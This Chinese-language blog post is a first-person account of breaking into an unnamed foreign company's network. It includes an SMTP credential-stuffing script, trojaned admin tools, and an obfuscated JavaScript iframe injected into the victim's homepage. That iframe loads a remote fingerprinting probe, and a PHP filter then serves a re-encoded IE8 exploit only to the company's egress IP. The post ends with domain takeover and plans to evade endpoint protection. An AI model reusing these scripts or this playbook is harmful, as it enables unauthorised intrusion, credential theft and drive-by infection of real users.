文章均由自己原創,只是一直沒有在自己博客發表。本地附件也沒有了,我是從網上找來我的以前的投稿。
寫在之前的廢話:小菜技術能力不行,如果你覺得此文實在看不下去,還請PASS掉。如果你對我的文章有興趣,可以與我一起交流。文章因為敏感無圖,業內人士看看自然懂。
由于XXX耗時長,需要的支持多,而且目標敏感。在這里,我們不便介紹目標背景,也不多說其他的,直接來進入主題。
某國某目標,我盯了它大概半年。嗯,終于有一天,我覺得時機成熟,下手吧。
在滲透目標的前期,我們需要了解對方公司的安全意識。以及需要搜集所有網站的IP,公司的出口,以及公司網段所存在的B-C段,公司人員郵箱,公司人員愛好,facebook等信息。
首先,我把目標公司的WEB都給搜集好了,大公司一般C段都是在一起的。而我有個習慣,在滲透目標的時候,先喜歡把OWA的段找出來掃一下。這樣大概的就知道了公司的架構情況。而很多時候,大公司都是會把WEB段給區分的,哪幾個外網IP段是管理WEB的,哪幾個段是放數據庫的。不過隨著網絡越趨復雜,就算拿到了WEB?也就是在DMZ徘徊。不過只要拿到了WEB就好說了。Go把。
千辛萬苦拿下來了這個公司的一個WEB,WEB如何拿下來咱們不多說。不是重點。當我分析內網情況的時候,環境就是在DMZ,system權限。通過判斷協議,TCP?HTTP都沒問題。于是,我把DMZ?WEB給中了一個馬,這樣更容易操作,至少得到了一個交互式的shell。先把遠控拋開不說,通過netstat?-ano分析。WEB服務器連上了在內部的一臺數據庫服務器。于是我找到了WEB服務器的web.config腳本,成功得到了數據庫賬戶密碼,但是數據庫賬戶權限非SA,而且SQL?SERVER版本是2008(悲劇,MSSQL?2000的話直接就遠程溢出了).沒辦法,就算我們導了個shell,又有何用?不著急,慢慢分析,于是我試著去ping內網數據庫機器,PING不通,接著我在拿S掃描器開了很小的線程,掃了掃WEB連接的數據庫那臺機器。和我猜想的結果是一樣,這種情況我不是第一次碰到了。就只有個1433能夠過去。這時,我猜想大概的內網架構是這樣的:
WEB–>防火墻–>數據庫服務器–>內網(而當我搞下來,發現情況并不是這樣的)
算了,沒辦法。先不管了,連上數據庫,分析數據,看能否去撞號,登OWA或者郵箱之類的。
于是寫了個PYTHON腳本,去跑他們的OWA(這個腳本是N年前寫的,可能不太符合,大家去改改就好了。原理差不多):
?
import?smtplib?,sys?,timedef?main():server?=?"smtp.live.com"?#gmail?smtp.gmail.com,?yahoo?smtp.mail.yahoo.comfp?=?open("D:\python\\hotmail.txt")fp1?=?open("d:\python\\save.txt",?'a+')while?1:line?=?fp.readline()uandp?=?line.split('?')name?=?uandp[0]name?=?name.split('@')[0]pwd?=?uandp[1]pwd?=?pwd.split("\n")[0]try:smtp?=?smtplib.SMTP_SSL(server,465)??#?gmail?465except:print?"[*]Connect?Error."sys.exit(0)passtry:#smtp.set_debuglevel(1)#smtp.ehlo()#smtp.starttls()smtp.ehlo()smtp.login(name,pwd)except:print?"[-]:%s:%s"?%?(name,?pwd)pass#time.sleep(1)else:out?=?"[+]:%s:%s\n"?%?(name,?pwd)print?outfp1.write(out)fp1.flush()smtp.quit()smtp.close()fp.close()fp1.close()if?__name__=="__main__":main() ?
分析完數據,把數據庫中的目標人物郵箱都給挑選出來。跑完。手工測試VPN,都失敗了。沒辦法,繼續另尋其他的路子。
來回到遠控,通過分析,本機WEB有一個員工登錄的地方,但是是.NET的。不能改代碼。因為如果改寫代碼,需要重新編譯(這里可能我說的有錯。)但是有一個員工登錄的地方我們就已經足夠了,這里也先不管它。先分析再說。
我的遠控是可以切換用戶的,只要有用戶在,可以切換到對方的用戶下。首先分析了本地管理組的用戶,抓密碼。Query?user?發現有幾個用戶在線。于是我切換到每個用戶,主要就是查看IPC?。功夫不負有心人,當我切換到B的會話下的時候,NET?USE看了看。大家猜我看到了啥?(可能你會想,咱們不是在DMZ嗎?會話咋來的??管理員從內網連過來。)
?
C:\ProgramData>net useNew connections will be remembered.Status Local Remote Network-------------------------------------------------------------------------------\\TSCLIENT\C Microsoft Terminal Services\\TSCLIENT\D Microsoft Terminal Services\\TSCLIENT\E Microsoft Terminal Services\\TSCLIENT\F Microsoft Terminal ServicesThe command completed successfully. ?
?
沒錯,管理員從內網連接過來,把盤給帶過來了。這下有得玩了。于是我分析了連接過來的那個盤。通過netstat?-ano?知道了帶過盤來的那機器的IP。趕緊分析,知道了對方是管理員,在OWA的MAILBOX服務器上鏈接過來的。搞的多的就知道,MAILBOX是沒WEB的,當然也有。MAILBOX主要的作用就是來存儲MAIL的郵件數據。于是我CURL,S掃描了服務器的那個段。一樣的,我DMZ怎么都過不去,而且對方常用端口也沒開。如果開了,咱們直接復制個shell就過去,本地借用內網那臺服務器執行命令就可以了。但是環境不允許我們這么容易就進入別人內網,扭轉了幾天,還是沒辦法,當我最后分析到另外一個盤符的時候,我竟然看到了IT服務器的一個盤,里面有IT部門的一部分密碼。趕緊下載分析。這樣,基本上我判斷,域管可能在里面。于是我來到VPN,一個一個測試,竟然都失敗了。心想:FUCK,肯定這個是一個小域,沒有VPN可以有權限登錄。然后在一個一個來測試OWA,竟然登錄進去了一個。分析所有郵件,搜索關鍵字:PASSWORD?FTP?RDP?SERVER,HACKER。等字眼。沒有所獲,就看到一封說近期有人在搞他們公司,需要加強安全防范的郵件(當然不是我。)。可能這時候很多人想:發郵件,綁馬??如果說你有0DAY或者免殺好的NDAY可以這樣做。不然就是找死了。
這個時候,我還是信心滿滿的,不是有IT部門的盤嗎??嘿嘿,下載了幾個常用的工具,比如VPN,補丁。綁馬了,在傳上去。還給CMD綁了個馬,放到了MAILBOX的c:\users\**\desktop
把每個用戶桌面上都放了一個CMD.EXE。就不相信管理員不運行。
等啊等啊,等了差不多半個月。沒任何反映,決定還是自己出手。不然就被動,連WEB掉了都不好了。
從網上找代碼,自己改寫了一個PHP,在WEB服務器上掛了一個探針。這里有個小知識:WEB服務器不是http協議的,而是https來進行訪問的,所以我們需要找一個https的網站(綠標的那種),不然你是探針不到任何信息的。說做就做,HTTPS綠標的網站我多的是,而PHP代碼簡單,改寫代碼如下:
?
function getBrowse() { global $_SERVER; $Agent = $_SERVER['HTTP_USER_AGENT']; $browser = ''; $browserver = ''; $Browser = array('Lynx', 'MOSAIC', 'AOL', 'Opera', 'JAVA', 'MacWeb', 'WebExplorer', 'OmniWeb'); for($i = 0; $i <= 7; $i ++){ if(strpos($Agent, $Browsers[$i])){ $browser = $Browsers[$i]; $browserver = ''; } } if(ereg('Mozilla', $Agent) && ereg('Maxthon', $Agent)){ $temp = explode('Maxthon/', $Agent); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[0]; $browser = 'Maxthon'; } if(ereg('Mozilla', $Agent) && ereg('Chrome', $Agent) && !ereg('Maxthon', $Agent)){ $temp = explode('Chrome/', $Agent); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[0]; $browser = 'Chrome'; } if(ereg('Mozilla', $Agent) && ereg('Opera', $Agent)) { $temp = explode('(', $Agent); $Part = $temp[1]; $temp = explode(')', $Part); $browserver = $temp[1]; $temp = explode(' ', $browserver); $browserver = $temp[2]; $browserver = preg_replace('/([d.]+)/', '\1', $browserver); $browserver = $browserver; $browser = 'Opera'; } if(ereg('Mozilla', $Agent) && ereg('MSIE', $Agent)){ $temp = explode('(', $Agent); $Part = $temp[1]; $temp = explode(';', $Part); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[2]; $browserver = preg_replace('/([d.]+)/','\1',$browserver); $browserver = $browserver; $browser = 'Internet Explorer'; } if($browser != ''){ $browseinfo = $browser.' '.$browserver; } else { $browseinfo = 'Unknow Browser'; } return $browseinfo; } function getIP() {return isset($_SERVER["HTTP_X_FORWARDED_FOR"])?$_SERVER["HTTP_X_FORWARDED_FOR"]:(isset($_SERVER["HTTP_CLIENT_IP"])?$_SERVER["HTTP_CLIENT_IP"]:$_SERVER["REMOTE_ADDR"]);}function getOS () { global $_SERVER; $agent = $_SERVER['HTTP_USER_AGENT']; $os = false; if (eregi('win', $agent) && strpos($agent, '95')){ $os = 'Windows 95'; } else if (eregi('win 9x', $agent) && strpos($agent, '4.90')){ $os = 'Windows ME'; } else if (eregi('win', $agent) && ereg('98', $agent)){ $os = 'Windows 98'; } else if (eregi('win', $agent) && eregi('nt 6.1', $agent)){ $os = 'Windows 7'; }else if (eregi('win', $agent) && eregi('nt 6', $agent)){ $os = 'Windows Vista'; } else if (eregi('win', $agent) && eregi('nt 5.1', $agent)){ $os = 'Windows XP'; } else if (eregi('win', $agent) && eregi('nt 5', $agent)){ $os = 'Windows 2000'; } else if (eregi('win', $agent) && eregi('nt', $agent)){ $os = 'Windows NT'; } else if (eregi('win', $agent) && ereg('32', $agent)){ $os = 'Windows 32'; } else if (eregi('linux', $agent)){ $os = 'Linux'; } else if (eregi('unix', $agent)){ $os = 'Unix'; } else if (eregi('sun', $agent) && eregi('os', $agent)){ $os = 'SunOS'; } else if (eregi('ibm', $agent) && eregi('os', $agent)){ $os = 'IBM OS/2'; } else if (eregi('Mac', $agent) && eregi('PC', $agent)){ $os = 'Macintosh'; } else if (eregi('PowerPC', $agent)){ $os = 'PowerPC'; } else if (eregi('AIX', $agent)){ $os = 'AIX'; } else if (eregi('HPUX', $agent)){ $os = 'HPUX'; } else if (eregi('NetBSD', $agent)){ $os = 'NetBSD'; } else if (eregi('BSD', $agent)){ $os = 'BSD'; } else if (ereg('OSF1', $agent)){ $os = 'OSF1'; } else if (ereg('IRIX', $agent)){ $os = 'IRIX'; } else if (eregi('FreeBSD', $agent)){ $os = 'FreeBSD'; } else if (eregi('teleport', $agent)){ $os = 'teleport'; } else if (eregi('flashget', $agent)){ $os = 'flashget'; } else if (eregi('webzip', $agent)){ $os = 'webzip'; } else if (eregi('offline', $agent)){ $os = 'offline'; } else { $os = 'Unknown'; } return $os; } 這里貼的PHP代碼并非完整的,大家可以自己去改寫。
腳本的功能是獲取來源IP,OS,瀏覽器版本等等。當然如果你覺得還少,你可以加入探針JAVA,FLASH的一些功能。這里不在多說。
于是來到WEB主站,查看主頁調用的JS。在JS里插入一段混淆代碼。
?
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 4=\\"2://3//9.a\\" 7=0 8=0></1>");',11,11,'|iframe|https|xxx|src|document|write|height|width|Ie|php'.split('|'),0,{})) 而原型如下:
document.write("<iframe src=\"https://xxx//Ie.php\" height=0 width=0></iframe>"); 接下來我們要做的就是分析來源IP,等待了幾天以后。我查看了探針的地址。記錄了不少IP.但是那么多IP應該如何來確定哪個是他們的出口IP呢?
沒辦法,偷懶把,寫了個PYTHON腳本:
#!/usr/bin/env python#-*- coding:utf-8 -*-import sysimport threadingimport httplibimport reimport timeclass Myclass(threading.Thread):def __init__(self,host,path):threading.Thread.__init__(self)self.host = hostself.path = pathself.result = []def run(self):if "https://" in self.host:conn = httplib.HTTPSConnection(self.host,80,None,None,False,10)else:conn = httplib.HTTPConnection(self.host,80,False,10)i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-Us; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain"}conn.request('GET',self.path,headers = i_headers)r1 = conn.getresponse()text = r1.read()text1 = text.lstrip()#size = text.count("\n")test = open('ip.txt','a+')test.write(text1)b = open("ip.txt",'r')c = open("ids.txt",'w')for line in b.readlines():m = re.search(r'(IP:\d*.\w*.\d*.\d*.\d*)',line) mm = m.group(0)owa = mm.replace("IP:","").strip().replace("\n","")self.result = owa.replace("\n","")c.write(self.result)c.write("\n")#print "write success"g = open("ids.txt",'r')for lines in g.readlines():getsip = lines.replace("\n","")try:conns = httplib.HTTPConnection("bgp.he.net",80,False,10)except Exception:print "[-]:connection out time"breakelse:conns.request('GET','/ip/%s' % getsip,headers = i_headers)r2 = conns.getresponse()texts = r2.read()try:line_split = re.search(r'(<u>.*\d+\D+.*.title=)',texts)obj = line_split.group(0)print "server:",obj.replace("<u>","").replace("</u>","").replace("\n","").replace("(<a href=\"","search domain:").replace("\" title=","").replace("/dns/","")except Exception, e:passtime.sleep(5)#print line_splitdef main():if len(sys.argv) < 3:print "[*]:Usage python info.py 127.0.0.1 /path"sys.exit(1)Mythread = Myclass(sys.argv[1],str(sys.argv[2]))Mythread.start()if __name__ == "__main__":main() ?
這個腳本的功能是先把目標網站記錄的IP地址全部給讀取下來,在本地保存為TXT,在循環依次讀取一個IP,來到接口bgp.he.net?這個接口查詢。至于如何分辨公司出口IP,不在多說了。看IP信息以及訪問源就知道了。
成功獲取到對方公司的出口IP,接下來就好辦了。知道對方用的瀏覽器版本,OS,等等。
于是先決定先測試ie8的漏洞,網上找了個IE8的漏洞。本地WIN7?XP測試沒問題(因為對方公司還是有人在用IE8,win7默認就是IE8)。但是網上找的IE8的漏洞都是被殺的不行的,于是心想,自己做把。
于是網上找了一個BASE64?JS解密腳本,把IE8的網馬內寫了幾個函數,把核心代碼都給放到函數里。然后直接把函數內都給BASE64加密了。OK,很簡單把,不殺了。
但是我們在掛馬的時候,并不是瞎掛。而是必須有針對性的掛,不然你掛上,殺毒軟件一下把你樣本給抓走了。改天又出這報告又出那報告的。多丟人。那就得需要一個定向掛馬的腳本了。因為對方的HTTPS的,我VPS上沒裝HTTPS的證書,心想,直接就通過WEBSHELL把這串代碼放到綠標的HTTPS網站上就好了。
定向掛馬腳本如下:
?
function check_ip(){$ALLOWED_IP=array('192.168.2.*','目標公司出口IP');$IP=getIP();$check_ip_arr= explode('.',$IP);if(!in_array($IP,$ALLOWED_IP)) {foreach ($ALLOWED_IP as $val){if(strpos($val,'*')!==false){$arr=array();$arr=explode('.', $val);$bl=true;for($i=0;$i<4;$i++){if($arr[$i]!='*'){if($arr[$i]!=$check_ip_arr[$i]){$bl=false;break;}}}if($bl){return;die;}}}header('HTTP/1.1 403 Forbidden');exit();die;} else{} 腳本的else后頭,就是調用的那個網馬了。
我把這個腳本和IE網馬都給放到了綠標的網站上,于是重新在目標網站上,把探針去了。加入咱們的PHP腳本地址,遠程調用。接下來要做的事情就是等著把。
誰沒成想:剛掛上沒5分鐘,目標公司人中了我的網馬,上線了。擦噢,這人品,不是一般的好。
趕緊把代碼給取了。做內網滲透去了。而當我們到達內網的時候,內網情況卻是這樣的
DMZ-> WAF-> mailbox(我來到了這臺服務器上)-> IDS/IPS-> 另外的域-> 主域
媽的額,好麻煩。沒辦法啦。之前拿下來了IT的管理密碼的清單,先把當前域搞下來再說。毫無懸念的,直接連上了當前的域,控制了OWA?SERVER。擦屁股走人,遠控上操作去了。
雖然拿下來了這個域,但是這個域內就那么幾十臺個人機,而目標公司是幾萬人,看樣子這個是他們的一個分的部門。只有繼續深入了。
接下來我們要找的就是其余域的其他網段了,我ping了下目標公司的主站www.xxoo.com,嗯,內網IP地址是10.xx.xx.xx,嗯,雖然能夠PING通,但是IPC這些都是不行的。接下來要做的就是打入其他域,搞定其他域,慢慢深入。
于是把目標個公司所有域名全部給搜集起來,在內網一個一個ping,把返回是內網的IP地址都給記錄下來。
然后把朋友寫的掃描器,指定線程,上去掃常用的WEB框架,數據庫之類的東西。
預知后事如何,還請聽下回分解。謝謝。
目前主域已經搞下來了,但是無奈沒域管,好不容易抓到。但是被BIT9發現我了,把我又T出來了。還是得慢慢來,不著急,慢慢分析把。下回且聽分析如何繞過防范不嚴的BIT9。
很多人看了文章可能會覺得我說的太籠統了,倒是。我不可能那么詳細的說出來一些東西,但是如果你能夠在這個文章里學習到新的思路,那就是我寫這個文章的目的。
?
)
)
)
)
)